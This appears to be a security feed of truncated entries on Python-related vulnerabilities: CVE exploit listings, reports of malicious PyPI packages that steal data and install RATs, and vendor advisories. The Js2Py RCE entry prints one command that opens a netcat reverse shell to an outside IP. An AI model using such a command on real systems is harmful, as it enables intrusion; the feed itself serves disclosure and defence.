Exploit for CVE-2026-31431

CVE-2026-31431-exploitpy2py3 A script...

exploits

Copyfail Privilege escalation...

Malicious code in timecurrently (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 7e505f67724cdcb9846add9bc1236a4cf256f954d9be1dbc98a51b387cbc4871 During import, the package automatically downloads and executes code that first acts as an infostealer and then starts code acting as a RAT. It connects with a...

MAL-2026-3198 Malicious code in timecurrently (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 7e505f67724cdcb9846add9bc1236a4cf256f954d9be1dbc98a51b387cbc4871 During import, the package automatically downloads and executes code that first acts as an infostealer and then starts code acting as a RAT. It connects with a...

MAL-2026-3197 Malicious code in sdoihgio9sudghsiudbg (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 61f008a0a874bc97bef2f5d2c59d64b4ae73b7cdb66970e5f82a5abb8186372d During import, the package automatically downloads and executes code that first acts as an infostealer and then starts code acting as a RAT. It connects with a...

Exploit for CVE-2026-31431

CVE-2026-31431 - AFALG AEAD Splice UAF PoC Multi-language im...

SUSE CVE-2026-41140

Poetry is a dependency manager for Python. Prior to 2.3.4, the extractall function in src/poetry/utils/helpers.py:410-426 extracts sdist tarballs without path traversal protection on Python versions where tarfile.datafilter is unavailable. Considering only Python versions which are still supporte...

USN-8225-1: Python marshmallow vulnerabilities

Jared Deckard discovered that Python marshmallow did not correctly handle hiding certain fields. An attacker could possibly use this issue to leak sensitive information. This issue only affected Ubuntu 18.04 LTS. CVE-2018-17175 It was discovered that Python marshmallow did not efficiently handle...

[SECURITY] Fedora 42 Update: python3.9-3.9.25-9.fc42

Python 3.9 package for developers. This package exists to allow developers to test their code against an older version of Python. This is not a full Python stack and if you wish to run your applications with Python 3.9, see other distributions that support it, such as CentOS or RHEL or older Fedo...

[SECURITY] Fedora 43 Update: python3.9-3.9.25-9.fc43

Python 3.9 package for developers. This package exists to allow developers to test their code against an older version of Python. This is not a full Python stack and if you wish to run your applications with Python 3.9, see other distributions that support it, such as CentOS or RHEL or older Fedo...

[SECURITY] Fedora 44 Update: python3.9-3.9.25-9.fc44

Python 3.9 is an accessible, high-level, dynamically typed, interpreted programming language, designed with an emphasis on code readability. It includes an extensive standard library, and has a vast ecosystem of third-party libraries. The python3.9 package provides the "python3.9" executable: the...

MAL-2026-3194 Malicious code in robase-dnb (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 24da23c2c626baf8f3c35e8c5000506cdadb4d8129d0e4350b262a0e3922d8c7 During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...

Amazon Linux 2023 : python3.12, python3.12-devel, python3.12-idle (ALAS2023-2026-1619)

It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2026-1619 advisory. The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update, |= operator, and unpickling paths were not patched, allowing control...

Js2Py 0.74 - RCE

Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...

AlmaLinux 9 : python3.12 (ALSA-2026:10745)

The remote AlmaLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the ALSA-2026:10745 advisory. python: Python: Arbitrary code execution or information disclosure via use-after-free in decompression modules CVE-2026-6100 python: cpython: Python:...

Fedora 42 : python3.9 (2026-60a694a385)

The remote Fedora 42 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2026-60a694a385 advisory. Security fixes for CVE-2026-4786 and CVE-2026-6100 Tenable has extracted the preceding description block directly from the Fedora security advisory...

Fedora 43 : python3.9 (2026-7986d7f994)

The remote Fedora 43 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2026-7986d7f994 advisory. Security fixes for CVE-2026-4786 and CVE-2026-6100 Tenable has extracted the preceding description block directly from the Fedora security advisory...

Medium: python3-pytest

Issue Overview: pytest through 9.0.2 on UNIX relies on directories with the /tmp/pytest-of-user name pattern, which allows local users to cause a denial of service or possibly gain privileges. CVE-2025-71176 Affected Packages: python3-pytest Note: This advisory is applicable to Amazon Linux 2 AL2...

Low: python-pip

Issue Overview: When pip is installing and extracting a maliciously crafted wheel archive, files may be extracted outside the installation directory. The path traversal is limited to prefixes of the installation directory, thus isn't able to inject or overwrite executable files in typical...

python311-pyOpenSSL-26.1.0-1.1 on GA media (moderate)

python311-pyOpenSSL-26.1.0-1.1 on GA media Announcement ID: openSUSE-SU-2026:10646-1 Rating: moderate Cross-References: CVE-2026-40475 CVSS scores: CVE-2026-40475 SUSE : 5.5 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2026-40475 SUSE : 6.8...